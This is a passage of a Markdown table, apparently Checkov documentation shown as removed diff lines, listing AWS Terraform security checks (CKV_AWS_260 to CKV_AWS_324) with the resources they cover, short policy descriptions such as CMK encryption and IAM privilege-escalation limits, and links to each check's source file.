-|  361 | CKV_AWS_260     | resource | aws_security_group_rule                                 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                   |
-|  362 | CKV_AWS_260     | resource | aws_vpc_security_group_ingress_rule                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                   |
-|  363 | CKV_AWS_261     | resource | aws_alb_target_group                                    | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py)                                                       |
-|  364 | CKV_AWS_261     | resource | aws_lb_target_group                                     | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py)                                                       |
-|  365 | CKV_AWS_262     | resource | aws_kendra_index                                        | Ensure Kendra index Server side encryption uses CMK                                                                                                                                                      | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py)                                                                             |
-|  366 | CKV_AWS_263     | resource | aws_appflow_flow                                        | Ensure AppFlow flow uses CMK                                                                                                                                                                             | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py)                                                                                           |
-|  367 | CKV_AWS_264     | resource | aws_appflow_connector_profile                           | Ensure AppFlow connector profile uses CMK                                                                                                                                                                | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py)                                                           |
-|  368 | CKV_AWS_265     | resource | aws_keyspaces_table                                     | Ensure Keyspaces Table uses CMK                                                                                                                                                                          | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py)                                                                             |
-|  369 | CKV_AWS_266     | resource | aws_db_snapshot_copy                                    | Ensure DB Snapshot copy uses CMK                                                                                                                                                                         | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py)                                                                             |
-|  370 | CKV_AWS_267     | resource | aws_comprehend_entity_recognizer                        | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK)                                                                                                  | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py)                                           |
-|  371 | CKV_AWS_268     | resource | aws_comprehend_entity_recognizer                        | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK)                                                                                                 | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py)                                         |
-|  372 | CKV_AWS_269     | resource | aws_connect_instance_storage_config                     | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK                                                                                                                                     | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py)             |
-|  373 | CKV_AWS_270     | resource | aws_connect_instance_storage_config                     | Ensure Connect Instance S3 Storage Config uses CMK                                                                                                                                                       | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py)                                             |
-|  374 | CKV_AWS_271     | resource | aws_dynamodb_table_replica                              | Ensure DynamoDB table replica KMS encryption uses CMK                                                                                                                                                    | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py)                                                           |
-|  375 | CKV_AWS_272     | resource | aws_lambda_function                                     | Ensure AWS Lambda function is configured to validate code-signing                                                                                                                                        | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py)                                                                 |
-|  376 | CKV_AWS_273     | resource | aws_iam_user                                            | Ensure access is controlled through SSO and not AWS IAM defined users                                                                                                                                    | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py)                                                                         |
-|  377 | CKV_AWS_274     | resource | aws_iam_group_policy_attachment                         | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  378 | CKV_AWS_274     | resource | aws_iam_policy_attachment                               | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  379 | CKV_AWS_274     | resource | aws_iam_role                                            | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  380 | CKV_AWS_274     | resource | aws_iam_role_policy_attachment                          | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  381 | CKV_AWS_274     | resource | aws_iam_user_policy_attachment                          | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  382 | CKV_AWS_274     | resource | aws_ssoadmin_managed_policy_attachment                  | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  383 | CKV_AWS_275     | data     | aws_iam_policy                                          | Disallow policies from using the AWS AdministratorAccess policy                                                                                                                                          | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py)                                                                                 |
-|  384 | CKV_AWS_276     | resource | aws_api_gateway_method_settings                         | Ensure Data Trace is not enabled in API Gateway Method Settings                                                                                                                                          | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py)                                                     |
-|  385 | CKV_AWS_277     | resource | aws_security_group                                      | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                 |
-|  386 | CKV_AWS_277     | resource | aws_security_group_rule                                 | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                 |
-|  387 | CKV_AWS_277     | resource | aws_vpc_security_group_ingress_rule                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                 |
-|  388 | CKV_AWS_278     | resource | aws_memorydb_snapshot                                   | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK)                                                                                                                          | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py)                                                     |
-|  389 | CKV_AWS_279     | resource | aws_neptune_cluster_snapshot                            | Ensure Neptune snapshot is securely encrypted                                                                                                                                                            | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py)                                                         |
-|  390 | CKV_AWS_280     | resource | aws_neptune_cluster_snapshot                            | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py)                                           |
-|  391 | CKV_AWS_281     | resource | aws_redshift_snapshot_copy_grant                        | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                     | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py)                       |
-|  392 | CKV_AWS_282     | resource | aws_redshiftserverless_namespace                        | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK)                                                                                                         | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py)                                                     |
-|  393 | CKV_AWS_283     | data     | aws_iam_policy_document                                 | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource                                                                                                              | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py)                                                                               |
-|  394 | CKV_AWS_284     | resource | aws_sfn_state_machine                                   | Ensure State Machine has X-Ray tracing enabled                                                                                                                                                           | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py)                                                                                       |
-|  395 | CKV_AWS_285     | resource | aws_sfn_state_machine                                   | Ensure State Machine has execution history logging enabled                                                                                                                                               | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py)                                                 |
-|  396 | CKV_AWS_286     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  397 | CKV_AWS_286     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  398 | CKV_AWS_286     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  399 | CKV_AWS_286     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  400 | CKV_AWS_286     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  401 | CKV_AWS_287     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  402 | CKV_AWS_287     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  403 | CKV_AWS_287     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  404 | CKV_AWS_287     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  405 | CKV_AWS_287     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  406 | CKV_AWS_288     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  407 | CKV_AWS_288     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  408 | CKV_AWS_288     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  409 | CKV_AWS_288     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  410 | CKV_AWS_288     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  411 | CKV_AWS_289     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  412 | CKV_AWS_289     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  413 | CKV_AWS_289     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  414 | CKV_AWS_289     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  415 | CKV_AWS_289     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  416 | CKV_AWS_290     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  417 | CKV_AWS_290     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  418 | CKV_AWS_290     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  419 | CKV_AWS_290     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  420 | CKV_AWS_290     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  421 | CKV_AWS_291     | resource | aws_msk_cluster                                         | Ensure MSK nodes are private                                                                                                                                                                             | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py)                                                                     |
-|  422 | CKV_AWS_292     | resource | aws_docdb_global_cluster                                | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted)                                                                                                                           | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py)                                                               |
-|  423 | CKV_AWS_293     | resource | aws_db_instance                                         | Ensure that AWS database instances have deletion protection enabled                                                                                                                                      | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py)                                                             |
-|  424 | CKV_AWS_294     | resource | aws_cloudtrail_event_data_store                         | Ensure CloudTrail Event Data Store uses CMK                                                                                                                                                              | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py)                                                         |
-|  425 | CKV_AWS_295     | resource | aws_datasync_location_object_storage                    | Ensure DataSync Location Object Storage doesn't expose secrets                                                                                                                                           | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py)                                                           |
-|  426 | CKV_AWS_296     | resource | aws_dms_endpoint                                        | Ensure DMS endpoint uses Customer Managed Key (CMK)                                                                                                                                                      | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py)                                                                                   |
-|  427 | CKV_AWS_297     | resource | aws_scheduler_schedule                                  | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK)                                                                                                                                    | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py)                                                                       |
-|  428 | CKV_AWS_298     | resource | aws_dms_s3_endpoint                                     | Ensure DMS S3 uses Customer Managed Key (CMK)                                                                                                                                                            | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py)                                                                                               |
-|  429 | CKV_AWS_300     | resource | aws_s3_bucket_lifecycle_configuration                   | Ensure S3 lifecycle configuration sets period for aborting failed uploads                                                                                                                                | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py)                                                                       |
-|  430 | CKV_AWS_301     | resource | aws_lambda_permission                                   | Ensure that AWS Lambda function is not publicly accessible                                                                                                                                               | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py)                                                                     |
-|  431 | CKV_AWS_302     | resource | aws_db_snapshot                                         | Ensure DB Snapshots are not Public                                                                                                                                                                       | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py)                                                                             |
-|  432 | CKV_AWS_303     | resource | aws_ssm_document                                        | Ensure SSM documents are not Public                                                                                                                                                                      | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py)                                                                           |
-|  433 | CKV_AWS_304     | resource | aws_secretsmanager_secret_rotation                      | Ensure Secrets Manager secrets should be rotated within 90 days                                                                                                                                          | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py)                                                                     |
-|  434 | CKV_AWS_305     | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution has a default root object configured                                                                                                                                      | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py)                                                     |
-|  435 | CKV_AWS_306     | resource | aws_sagemaker_notebook_instance                         | Ensure SageMaker notebook instances should be launched into a custom VPC                                                                                                                                 | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py)                                                               |
-|  436 | CKV_AWS_307     | resource | aws_sagemaker_notebook_instance                         | Ensure SageMaker Users should not have root access to SageMaker notebook instances                                                                                                                       | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py)                                                                             |
-|  437 | CKV_AWS_308     | resource | aws_api_gateway_method_settings                         | Ensure API Gateway method setting caching is set to encrypted                                                                                                                                            | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py)                                           |
-|  438 | CKV_AWS_309     | resource | aws_apigatewayv2_route                                  | Ensure API GatewayV2 routes specify an authorization type                                                                                                                                                | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py)                                     |
-|  439 | CKV_AWS_310     | resource | aws_cloudfront_distribution                             | Ensure CloudFront distributions should have origin failover configured                                                                                                                                   | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py)                                               |
-|  440 | CKV_AWS_311     | resource | aws_codebuild_project                                   | Ensure that CodeBuild S3 logs are encrypted                                                                                                                                                              | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py)                                                                       |
-|  441 | CKV_AWS_312     | resource | aws_elastic_beanstalk_environment                       | Ensure Elastic Beanstalk environments have enhanced health reporting enabled                                                                                                                             | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py)                                         |
-|  442 | CKV_AWS_313     | resource | aws_rds_cluster                                         | Ensure RDS cluster configured to copy tags to snapshots                                                                                                                                                  | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py)                                                                                   |
-|  443 | CKV_AWS_314     | resource | aws_codebuild_project                                   | Ensure CodeBuild project environments have a logging configuration                                                                                                                                       | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py)                                                                                       |
-|  444 | CKV_AWS_315     | resource | aws_autoscaling_group                                   | Ensure EC2 Auto Scaling groups use EC2 launch templates                                                                                                                                                  | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py)                                                                     |
-|  445 | CKV_AWS_316     | resource | aws_codebuild_project                                   | Ensure CodeBuild project environments do not have privileged mode enabled                                                                                                                                | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py)                                                                         |
-|  446 | CKV_AWS_317     | resource | aws_elasticsearch_domain                                | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                         |
-|  447 | CKV_AWS_317     | resource | aws_opensearch_domain                                   | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                         |
-|  448 | CKV_AWS_318     | resource | aws_elasticsearch_domain                                | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA                                                                                                            | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py)                                                                             |
-|  449 | CKV_AWS_318     | resource | aws_opensearch_domain                                   | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA                                                                                                            | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py)                                                                             |
-|  450 | CKV_AWS_319     | resource | aws_cloudwatch_metric_alarm                             | Ensure that CloudWatch alarm actions are enabled                                                                                                                                                         | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py)                                                                         |
-|  451 | CKV_AWS_320     | resource | aws_redshift_cluster                                    | Ensure Redshift clusters do not use the default database name                                                                                                                                            | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py)                                                                 |
-|  452 | CKV_AWS_321     | resource | aws_redshift_cluster                                    | Ensure Redshift clusters use enhanced VPC routing                                                                                                                                                        | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py)                                               |
-|  453 | CKV_AWS_322     | resource | aws_elasticache_cluster                                 | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled                                                                                                                     | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py)                                                   |
-|  454 | CKV_AWS_323     | resource | aws_elasticache_cluster                                 | Ensure ElastiCache clusters do not use the default subnet group                                                                                                                                          | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py)                                                                   |
-|  455 | CKV_AWS_324     | resource | aws_rds_cluster                                         | Ensure that RDS Cluster log capture is enabled                                                                                                                                                           | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py)                                                                                     |
